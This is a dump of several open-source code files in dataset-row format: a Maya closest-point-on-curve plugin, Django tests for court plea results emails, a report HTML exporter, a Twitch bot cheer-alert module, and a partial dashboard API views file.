repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
sergeneren/anima | anima/env/mayaEnv/plugins/closestPointOnCurve.py | 1 | 8872 | # -*- coding: utf-8 -*-
# Copyright (c) 2012-2015, Anima Istanbul
#
# This module is part of anima-tools and is released under the BSD 2
# License: http://www.opensource.org/licenses/BSD-2-Clause
import sys
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
kPluginNodeTypeName = "spClosestPointOnCurve"
cpocPluginId = OpenMaya.MTypeId(0x00349)
# Node definition
class closestPointOnCurve(OpenMayaMPx.MPxNode):
# the plugs
aInCurve = OpenMaya.MObject()
aInPosition = OpenMaya.MObject()
aOutPosition = OpenMaya.MObject()
aOutPositionX = OpenMaya.MObject()
aOutPositionY = OpenMaya.MObject()
aOutPositionZ = OpenMaya.MObject()
aOutNormal = OpenMaya.MObject()
aOutNormalX = OpenMaya.MObject()
aOutNormalY = OpenMaya.MObject()
aOutNormalZ = OpenMaya.MObject()
aOutParam = OpenMaya.MObject()
def __init__(self):
OpenMayaMPx.MPxNode.__init__(self)
def compute(self, plug, dataBlock):
if plug == closestPointOnCurve.aOutPosition or plug == closestPointOnCurve.aOutParam:
dataHandle = dataBlock.inputValue(closestPointOnCurve.aInCurve)
inputAsCurve = dataHandle.asNurbsCurve()
#if not inputAsCurve.hasFn(OpenMaya.MFn.kNurbsCurve):
# return OpenMaya.kUnknownParameter
dataHandle = dataBlock.inputValue(closestPointOnCurve.aInPosition)
inPositionAsFloat3 = dataHandle.asFloat3()
inPosition = OpenMaya.MPoint(
inPositionAsFloat3[0],
inPositionAsFloat3[1],
inPositionAsFloat3[2]
)
# connect the MFnNurbsCurve
# and ask the closest point
nurbsCurveFn = OpenMaya.MFnNurbsCurve(inputAsCurve)
# get and set outPosition
outParam = OpenMaya.MScriptUtil()
outParam.createFromDouble(0)
outParamPtr = outParam.asDoublePtr()
# get position and paramater
outPosition = nurbsCurveFn.closestPoint(
inPosition, True, outParamPtr, 0.001, OpenMaya.MSpace.kWorld
)
outputHandle = dataBlock.outputValue(
closestPointOnCurve.aOutPosition
)
outputHandle.set3Float(outPosition.x, outPosition.y, outPosition.z)
# get and set outNormal
#outNormal = nurbsCurveFn.normal(parameter, OpenMaya.MSpace.kWorld)
#outputHandle = dataBlock.outputValue(closestPointOnCurve.aOutNormal)
#outputHandle.set3Float(outNormal.x, outNormal.y, outNormal.z)
#outputHandle.set3Float(0, 1, 0 )
# get and set the uvs
outputHandle = dataBlock.outputValue(closestPointOnCurve.aOutParam)
#outputHandle.setFloat(OpenMaya.MScriptUtil(outParamPtr).asDouble())
outputHandle.setFloat(OpenMaya.MScriptUtil.getDouble(outParamPtr))
dataBlock.setClean(plug)
else:
return OpenMaya.kUnknownParameter
# creator
def nodeCreator():
return OpenMayaMPx.asMPxPtr(closestPointOnCurve())
# initializer
def nodeInitializer():
tAttr = OpenMaya.MFnTypedAttribute()
nAttr = OpenMaya.MFnNumericAttribute()
# input curve
closestPointOnCurve.aInCurve = tAttr.create(
"inCurve", "ic", OpenMaya.MFnData.kNurbsCurve
)
tAttr.setStorable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInCurve)
# input position
closestPointOnCurve.aInPositionX = nAttr.create(
"inPositionX", "ipx", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPositionX)
closestPointOnCurve.aInPositionY = nAttr.create(
"inPositionY", "ipy", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPositionY)
closestPointOnCurve.aInPositionZ = nAttr.create(
"inPositionZ", "ipz", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPositionZ)
closestPointOnCurve.aInPosition = nAttr.create(
"inPosition", "ip",
closestPointOnCurve.aInPositionX,
closestPointOnCurve.aInPositionY,
closestPointOnCurve.aInPositionZ
)
nAttr.setStorable(1)
nAttr.setKeyable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPosition)
# output position
closestPointOnCurve.aOutPositionX = nAttr.create(
"outPositionX", "opx", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPositionX)
closestPointOnCurve.aOutPositionY = nAttr.create(
"outPositionY", "opy", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPositionY)
closestPointOnCurve.aOutPositionZ = nAttr.create(
"outPositionZ", "opz", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPositionZ)
closestPointOnCurve.aOutPosition = nAttr.create(
"outPosition", "op",
closestPointOnCurve.aOutPositionX,
closestPointOnCurve.aOutPositionY,
closestPointOnCurve.aOutPositionZ
)
nAttr.setStorable(0)
nAttr.setKeyable(0)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPosition)
# output normal
closestPointOnCurve.aOutNormalX = nAttr.create(
"outNormalX", "onx", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormalX)
closestPointOnCurve.aOutNormalY = nAttr.create(
"outNormalY", "ony", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormalY)
closestPointOnCurve.aOutNormalZ = nAttr.create(
"outNormalZ", "onz", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormalZ)
closestPointOnCurve.aOutNormal = nAttr.create(
"outNormal", "on",
closestPointOnCurve.aOutNormalX,
closestPointOnCurve.aOutNormalY,
closestPointOnCurve.aOutNormalZ
)
nAttr.setStorable(0)
nAttr.setKeyable(0)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormal)
closestPointOnCurve.aOutParam = nAttr.create(
"outParam", "opa", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setKeyable(0)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutParam)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInCurve,
closestPointOnCurve.aOutPosition
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInPosition,
closestPointOnCurve.aOutPosition
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInCurve,
closestPointOnCurve.aOutParam
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInPosition,
closestPointOnCurve.aOutParam
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInCurve,
closestPointOnCurve.aOutNormal
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInPosition,
closestPointOnCurve.aOutNormal
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aOutParam,
closestPointOnCurve.aOutPosition
)
# initialize the script plug-in
def initializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject, "Erkan Ozgur Yilmaz","1.0.2")
try:
mplugin.registerNode(
kPluginNodeTypeName,
cpocPluginId,
nodeCreator,
nodeInitializer
)
except:
sys.stderr.write("Failed to register node: %s" % kPluginNodeTypeName)
raise
# uninitialize the script plug-in
def uninitializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject)
try:
mplugin.deregisterNode(cpocPluginId)
except:
sys.stderr.write("Failed to deregister node: %s" % kPluginNodeTypeName)
raise
| bsd-2-clause | -1,998,576,980,713,366,500 | 32.228464 | 93 | 0.679554 | false |
ministryofjustice/manchester_traffic_offences_pleas | apps/result/tests.py | 1 | 14800 | # -*- coding: utf-8 -*-
import datetime as dt
import os
from mock import patch
from decimal import Decimal
from io import StringIO
from django.core import mail
from django.test import TestCase
from apps.plea.models import Court, Case, CaseOffenceFilter
from .models import Result, ResultOffenceData, ResultOffence
from .management.commands.process_results import Command
class ResultTestCase(TestCase):
def setUp(self):
self.test_court = Court.objects.create(
court_code="1234",
region_code="51",
court_name="Test Court",
enabled=True
)
self.test_case1 = Case.objects.create(
case_number="12345678",
urn="51XX0000000",
email="[email protected]",
sent=True
)
self.test_result1 = Result.objects.create(
urn="51XX0000000",
case_number="12345678",
case=self.test_case1,
date_of_hearing=dt.date.today(),
sent=False,
processed=False,
account_number="12345",
division="100"
)
self.offence1 = ResultOffence.objects.create(
result=self.test_result1,
offence_code="XXXXXXX",
offence_seq_number="001"
)
self.offence2 = ResultOffence.objects.create(
result=self.test_result1,
offence_code="YYYYYYY",
offence_seq_number="002"
)
self.f_code_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINAL CODE"
)
def test_has_valid_offences_with_non_whitelisted_offences(self):
CaseOffenceFilter.objects.create(filter_match="VVVVV", description="A test whitelist entry")
self.assertFalse(self.test_result1.has_valid_offences())
def test_has_valid_offences_with_all_whitelisted_offences(self):
CaseOffenceFilter.objects.create(filter_match="YYYYY", description="A test whitelist entry")
CaseOffenceFilter.objects.create(filter_match="XXXX", description="A test whitelist entry")
self.assertTrue(self.test_result1.has_valid_offences())
def test_can_result_succeeds(self):
result, _ = self.test_result1.can_result()
self.assertTrue(result)
def test_can_result_with_adjourned_offence_is_false(self):
self.f_code_offence.delete()
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="A",
result_short_title="ADJOURNED!"
)
result, _ = self.test_result1.can_result()
self.assertFalse(result)
def test_can_result_with_adjourned_and_withdrawn_offence_is_true(self):
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="A",
result_short_title="ADJOURNED!"
)
self.withdrawn_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="WDRN",
result_short_title="FINE VICTIM SURCHARGE!"
)
result, _ = self.test_result1.can_result()
self.assertTrue(result)
def test_can_result_with_adjourned_and_final_codes_is_true(self):
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="A",
result_short_title="ADJOURNED!"
)
self.withdrawn_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="WDRN",
result_short_title="WITHDRAWN!"
)
def test_can_result_with_disqualified_code_is_false(self):
self.withdrawn_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="DDDT",
result_short_title="DISQUALIFIED!"
)
result, _ = self.test_result1.can_result()
self.assertFalse(result)
def test_can_result_missing_divcode_or_acc_number(self):
self.test_result1.account_number = ""
self.test_result1.save()
result, _ = self.test_result1.can_result()
self.assertFalse(result)
self.test_result1.account_number = "12345"
self.test_result1.division = ""
self.test_result1.save()
result, _ = self.test_result1.can_result()
self.assertFalse(result)
def test_get_offence_totals_fines(self):
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINE"
)
fines, _, _ = self.test_result1.get_offence_totals()
self.assertEquals(len(fines), 2)
def test_get_offence_totals_fines_wording_english(self):
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINE",
result_wording=u"english words £75.00 more english",
result_short_title_welsh="dirwy",
result_wording_welsh=u"I dalu costau o £75.00 welsh"
)
fines, _, _ = self.test_result1.get_offence_totals()
self.assertEquals(fines[0], u"english words £75.00 more english")
def test_get_offence_totals_fines_wording_welsh(self):
self.test_case1.language = "cy"
self.test_case1.save()
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINE",
result_wording=u"english words £75.00 more english",
result_short_title_welsh="dirwy",
result_wording_welsh=u"I dalu costau o £75.00 welsh"
)
fines, _, _ = self.test_result1.get_offence_totals()
self.assertEquals(fines[0], u"I dalu costau o £75.00 welsh")
def test_get_offence_totals_fines_wording_welsh_but_no_welsh_text(self):
self.test_case1.language = "cy"
self.test_case1.save()
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINE",
result_wording=u"english words £75.00 more english",
result_short_title_welsh="dirwy",
result_wording_welsh=u""
)
fines, _, _ = self.test_result1.get_offence_totals()
self.assertEquals(fines[0], u"english words £75.00 more english")
def test_get_offence_totals_fines_wording_welsh_but_whitespace_welsh_text(self):
self.test_case1.language = "cy"
self.test_case1.save()
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINE",
result_wording=u"english words £75.00 more english",
result_short_title_welsh="dirwy",
result_wording_welsh=u" "
)
fines, _, _ = self.test_result1.get_offence_totals()
self.assertEquals(fines[0], u"english words £75.00 more english")
def test_get_offence_totals_endorsements(self):
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="LEP",
result_short_title="ENDORSEMENT",
result_wording="Driving record endorsed with 3 points.",
)
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence2,
result_code="LEA",
result_short_title="ENDORSEMENT",
result_wording="Driving record endorsed with 6 points."
)
_, endorsements, _ = self.test_result1.get_offence_totals()
self.assertEquals(len(endorsements), 2)
self.assertEquals(endorsements[0], "Driving record endorsed with 3 points.")
self.assertEquals(endorsements[1], "Driving record endorsed with 6 points.")
def test_get_offence_totals_total(self):
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINE",
result_wording=u"asdfsadf £75.00 asasdfadfs"
)
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence2,
result_code="FVS",
result_short_title="FINE",
result_wording=u"asdfsadf £25.00 asasdfadfs"
)
_, _, total = self.test_result1.get_offence_totals()
self.assertEquals(Decimal("100"), total)
class ProcessResultsTestCase(TestCase):
def setUp(self):
self.test_court = Court.objects.create(
court_code="1234",
region_code="51",
court_name="Test Court",
enabled=True,
)
self.test_case1 = Case.objects.create(
case_number="12345678",
urn="51XX0000000",
sent=True,
email="[email protected]"
)
self.test_result1 = Result.objects.create(
urn="51XX0000000",
case_number="12345678",
date_of_hearing=dt.date.today(),
sent=False,
processed=False,
account_number="12345",
division="100"
)
self.offence1 = ResultOffence.objects.create(
result=self.test_result1
)
self.adjourned_result = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="A",
result_short_title="ADJOURNED"
)
self.withdrawn_result = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="WDRN",
result_short_title="WITHDRAWN"
)
self.final_result = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINAL"
)
self.command = Command(stdout=StringIO())
self.opts = dict(
override_recipient="",
status_email_recipients="",
dry_run=False,
date="")
def test_matching_case_with_email_is_sent(self):
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertTrue(result.sent)
self.assertTrue(result.processed)
self.assertEquals(len(mail.outbox), 1)
self.assertEquals(mail.outbox[0].to, [self.test_case1.email])
def test_option_override_recipient(self):
self.opts["override_recipient"] = "[email protected]"
self.command.handle(**self.opts)
self.assertEquals(len(mail.outbox), 1)
self.assertEquals(mail.outbox[0].to, ["[email protected]"])
def test_option_dry_run(self):
self.opts["dry_run"] = True
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertFalse(result.processed)
self.assertFalse(result.sent)
def test_option_send_status_email(self):
self.opts["dry_run"] = True
self.opts["status_email_recipients"] = "[email protected]"
self.command.handle(**self.opts)
self.assertEquals(len(mail.outbox), 1)
self.assertEquals(mail.outbox[0].to, ["[email protected]"])
@patch('os.environ.get')
def test_subject_includes_env(self, mock_env):
self.opts["dry_run"] = True
self.opts["status_email_recipients"] = "[email protected]"
mock_env.return_value = 'unit_test'
self.command.handle(**self.opts)
self.assertEquals(mail.outbox[0].subject, "[unit_test] make-a-plea resulting status email")
def test_no_supplied_email_no_result(self):
self.test_case1.email = None
self.test_case1.save()
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertTrue(result.processed)
self.assertFalse(result.sent)
def test_no_matching_case_no_email(self):
self.test_case1.delete()
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertTrue(result.processed)
self.assertFalse(result.sent)
def test_case_not_sent_result_not_sent(self):
"""
If the case does not have sent=True, do not send the result email
"""
self.test_case1.sent = False
self.test_case1.save()
self.command.handle(**self.opts)
result = Result.objects.get(id=self.test_result1.id)
self.assertFalse(result.sent)
self.assertTrue(result.processed)
def test_result_sent_not_resent(self):
self.test_result1.sent = True
self.test_result1.save()
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertEquals(mail.outbox, [])
def test_result_is_marked_sent_and_processed(self):
assert not self.test_result1.sent
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertTrue(result.sent)
self.assertTrue(result.processed)
def test_date_option(self):
assert self.test_result1.created.date() == dt.date.today()
self.opts["date"] = (dt.date.today()-dt.timedelta(7)).strftime("%d/%m/%Y")
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertFalse(result.sent)
self.assertFalse(result.processed)
def test_forward_email_section_removed_from_plain_text_email(self):
self.command.handle(**self.opts)
search_text = "If you're unsure an email is from the Ministry of Justice"
self.assertNotIn(search_text, mail.outbox[0].body)
def test_forward_email_section_removed_from_html_email(self):
self.command.handle(**self.opts)
search_text = "If you're unsure an email is from the Ministry of Justice"
self.assertNotIn(search_text, mail.outbox[0].alternatives[0][0])
def test_result_for_welsh_case_sent_in_welsh(self):
self.test_case1.language = "cy"
self.test_case1.save()
self.command.handle(**self.opts)
assert mail.outbox[0].subject == 'Canlyniad Cofnodi Ple'
assert 'Eich llys: Test Court' in mail.outbox[0].body
| mit | -1,403,374,018,041,353,200 | 29.744283 | 100 | 0.613741 | false |
appknox/vendor | ak_vendor/report_sample.py | 1 | 1164 | import json
from os.path import dirname, abspath
from django import template
from django.conf import settings
from django.template import Template, Context
from django.template.engine import Engine
from django.core.wsgi import get_wsgi_application
from ak_vendor.report import Report
settings.configure()
application = get_wsgi_application()
CUR_DIR = dirname(abspath(__file__))
template.Library()
class ReportHTMLExporter:
def __init__(self, report):
self.report = report
def to_html(self):
tpl = open('{}/report/report_template.html'.format(CUR_DIR)).read()
template = Template(tpl, engine=Engine(libraries={
'i18n': 'django.templatetags.i18n'
}))
context = Context({
'report': self.report
})
content = template.render(context)
return content
def to_html_file(self, path=''):
with open('{}/output.html'.format(path), 'w') as file:
tpl = self.to_html()
file.write(tpl)
data = json.load(open('{}/report_sample1.json'.format(CUR_DIR)))
report_obj = Report.from_json(data)
ReportHTMLExporter(report_obj).to_html_file(CUR_DIR)
| mit | 2,017,626,688,635,430,700 | 28.1 | 75 | 0.664089 | false |
pajlada/pajbot | pajbot/modules/chat_alerts/cheeralert.py | 1 | 12111 | import logging
import math
from pajbot.managers.handler import HandlerManager
from pajbot.modules import BaseModule
from pajbot.modules import ModuleSetting
from pajbot.modules.chat_alerts import ChatAlertModule
log = logging.getLogger(__name__)
class CheerAlertModule(BaseModule):
ID = __name__.split(".")[-1]
NAME = "Cheer Alert"
DESCRIPTION = "Prints a message in chat/whispers when a user cheers in your chat"
CATEGORY = "Feature"
ENABLED_DEFAULT = False
PARENT_MODULE = ChatAlertModule
SETTINGS = [
ModuleSetting(
key="chat_message",
label="Enable chat messages for users who cheer bits",
type="boolean",
required=True,
default=True,
),
ModuleSetting(
key="whisper_message",
label="Enable whisper messages for users who cheer bits",
type="boolean",
required=True,
default=False,
),
ModuleSetting(
key="whisper_after",
label="Whisper the message after X seconds",
type="number",
required=True,
placeholder="",
default=5,
constraints={"min_value": 1, "max_value": 120},
),
ModuleSetting(
key="one_bit",
label="Chat message for users who cheer 1 or more bits | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="{username} thank you so much for cheering {num_bits} bits! PogChamp",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="sixnine_bits",
label="Chat message for users who cheer 69 bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! Kreygasm",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="hundred_bits",
label="Chat message for users who cheer 100 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fourtwenty_bits",
label="Chat message for users who cheer 420 bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! CiGrip",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fivehundred_bits",
label="Chat message for users who cheer 500 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fifteenhundred_bits",
label="Chat message for users who cheer 1500 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fivethousand_bits",
label="Chat message for users who cheer 5000 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="tenthousand_bits",
label="Chat message for users who cheer 10000 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="twentyfivethousand_bits",
label="Chat message for users who cheer 25000 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="grant_points_per_100_bits",
label="Give points to user per 100 bits they cheer. 0 = off",
type="number",
required=True,
placeholder="",
default=0,
constraints={"min_value": 0, "max_value": 50000},
),
ModuleSetting(
key="alert_message_points_given",
label="Message to announce points were given to user, leave empty to disable message. If the user cheers less than 100 bits, no message will be sent. | Available arguments: {username}, {points}, {num_bits}",
type="text",
required=True,
default="{username} was given {points} points for cheering {num_bits} bits! FeelsAmazingMan",
constraints={"max_str_len": 300},
),
]
def __init__(self, bot):
super().__init__(bot)
def on_cheer(self, user, num_bits):
"""
A user just cheered bits.
Send the event to the websocket manager, and send a customized message in chat.
"""
payload = {"username": user.name, "num_bits": num_bits}
self.bot.websocket_manager.emit("cheer", payload)
if self.settings["chat_message"]:
if num_bits >= 25000 and self.settings["twentyfivethousand_bits"] != "":
self.bot.say(self.get_phrase("twentyfivethousand_bits", **payload))
elif num_bits >= 10000 and self.settings["tenthousand_bits"] != "":
self.bot.say(self.get_phrase("tenthousand_bits", **payload))
elif num_bits >= 5000 and self.settings["fivethousand_bits"] != "":
self.bot.say(self.get_phrase("fivethousand_bits", **payload))
elif num_bits >= 1500 and self.settings["fifteenhundred_bits"] != "":
self.bot.say(self.get_phrase("fifteenhundred_bits", **payload))
elif num_bits >= 500 and self.settings["fivehundred_bits"] != "":
self.bot.say(self.get_phrase("fivehundred_bits", **payload))
elif num_bits == 420 and self.settings["fourtwenty_bits"] != "":
self.bot.say(self.get_phrase("fourtwenty_bits", **payload))
elif num_bits >= 100 and self.settings["hundred_bits"] != "":
self.bot.say(self.get_phrase("hundred_bits", **payload))
elif num_bits == 69 and self.settings["sixnine_bits"] != "":
self.bot.say(self.get_phrase("sixnine_bits", **payload))
elif self.settings["one_bit"] != "":
self.bot.say(self.get_phrase("one_bit", **payload))
if self.settings["whisper_message"]:
if num_bits >= 25000 and self.settings["twentyfivethousand_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("twentyfivethousand_bits", **payload),
)
elif num_bits >= 10000 and self.settings["tenthousand_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("tenthousand_bits", **payload),
)
elif num_bits >= 5000 and self.settings["fivethousand_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fivethousand_bits", **payload),
)
elif num_bits >= 1500 and self.settings["fifteenhundred_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fifteenhundred_bits", **payload),
)
elif num_bits >= 500 and self.settings["fivehundred_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fivehundred_bits", **payload),
)
elif num_bits == 420 and self.settings["fourtwenty_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fourtwenty_bits", **payload),
)
elif num_bits >= 100 and self.settings["hundred_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("hundred_bits", **payload),
)
elif num_bits == 69 and self.settings["sixnine_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("sixnine_bits", **payload),
)
elif self.settings["one_bit"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("one_bit", **payload),
)
if self.settings["grant_points_per_100_bits"] <= 0:
return
round_number = math.floor(num_bits / 100)
if round_number > 0:
points_to_grant = round_number * self.settings["grant_points_per_100_bits"]
user.points += points_to_grant
alert_message = self.settings["alert_message_points_given"]
if alert_message != "":
self.bot.say(alert_message.format(username=user, points=points_to_grant, num_bits=num_bits))
def on_pubmsg(self, source, tags, **rest):
if "bits" not in tags:
return
try:
num_bits = int(tags["bits"])
except ValueError:
log.error("BabyRage error occurred with getting the bits integer")
return
if "display-name" not in tags:
log.debug(f"cheeralert requires a display-name, but it is missing: {tags}")
return
self.on_cheer(source, num_bits)
def enable(self, bot):
HandlerManager.add_handler("on_pubmsg", self.on_pubmsg)
def disable(self, bot):
HandlerManager.remove_handler("on_pubmsg", self.on_pubmsg)
| mit | -5,770,239,708,818,410,000 | 43.690037 | 219 | 0.546033 | false |
artemharutyunyan/copilot | src/copilot-dashboard/copilot_dashboard/dashboard/views.py | 1 | 3545 | import httplib2
import datetime
from urllib import urlencode
from random import random
from django.http import HttpRequest, HttpResponse
from django.core.serializers.json import DjangoJSONEncoder
from django.utils import simplejson
from django.conf import settings
import bson.json_util
from bson.objectid import ObjectId
import models as DB
from copilot_dashboard.settings import SETTINGS
HTTP = httplib2.Http("/tmp/httplib2-cache")
### Handlers ###
def ping(request):
"""
GET /api/ping
Responds with {"ping":"pong"} (HTTP 200) in case the system is working fine
Status codes:
* 200 - OK
"""
return json({'ping': 'pong'})
def stats(request):
"""
GET /api/stats?target={graphite path}[&from={start timestamp}&until={end timestamp}]
A simple Graphite proxy
Status codes:
* 200 - OK
* 400 - Missing query parameter
* 500 - No such data is available
"""
try:
path = request.GET['target']
except KeyError, e:
return json({'error': True}, 400)
start = request.GET.get('from', None)
end = request.GET.get('until', None)
data = mk_graphite_request(path, start, end)
return HttpResponse(data, mimetype="application/json")
def connections(request):
"""
GET /api/connections?from={start}[&allactive=true]
Lists all connected users in specified timeframe.
If 'allactive' is set to 'true', the timeframe will be ignored and instead
all currently connected users will be listed.
Response (JSON):
[
{"_id": "Document ID", "loc": [Longitude, Latitude]},
...
]
Status codes:
* 200 - OK
* 400 - Missing query parameter (from)
"""
collection = DB.get_collection('connections')
docs = []
query = None
if request.GET.get('allactive', 'false') == 'true':
query = {'connected': True, 'agent_data.component': 'agent'}
else:
try:
start = datetime.datetime.fromtimestamp(int(request.GET['from'])/1000)
except KeyError, e:
return json({'error': True}, 400)
query = {'updated_at': {'$gte': start}, 'agent_data.component': 'agent'}
for doc in collection.find(query, {'_id': 1, 'loc': 1}):
doc['loc'] = [coord + random()*0.0004 for coord in doc['loc']]
docs.append(doc)
return json(docs)
def connection_info(request, id):
"""
GET /api/connection/{connection id}
Responds with all data available for the specified connection (except for document's ID and coordinates).
Status codes:
* 200 - OK
* 404 - Given ID did not match any documents
"""
doc = DB.get_connection(id)
if not doc:
return json({'error': True}, 404)
else:
doc['contributions'] = DB.get_contributions(doc['agent_data']['id'])
return json(doc)
### Utilites ###
def mk_graphite_request(path, start, end):
global HTTP
query = {'target': path, 'format': 'json', '_salt': str(random)[2:]}
if start:
query['from'] = start
if end:
query['until'] = end
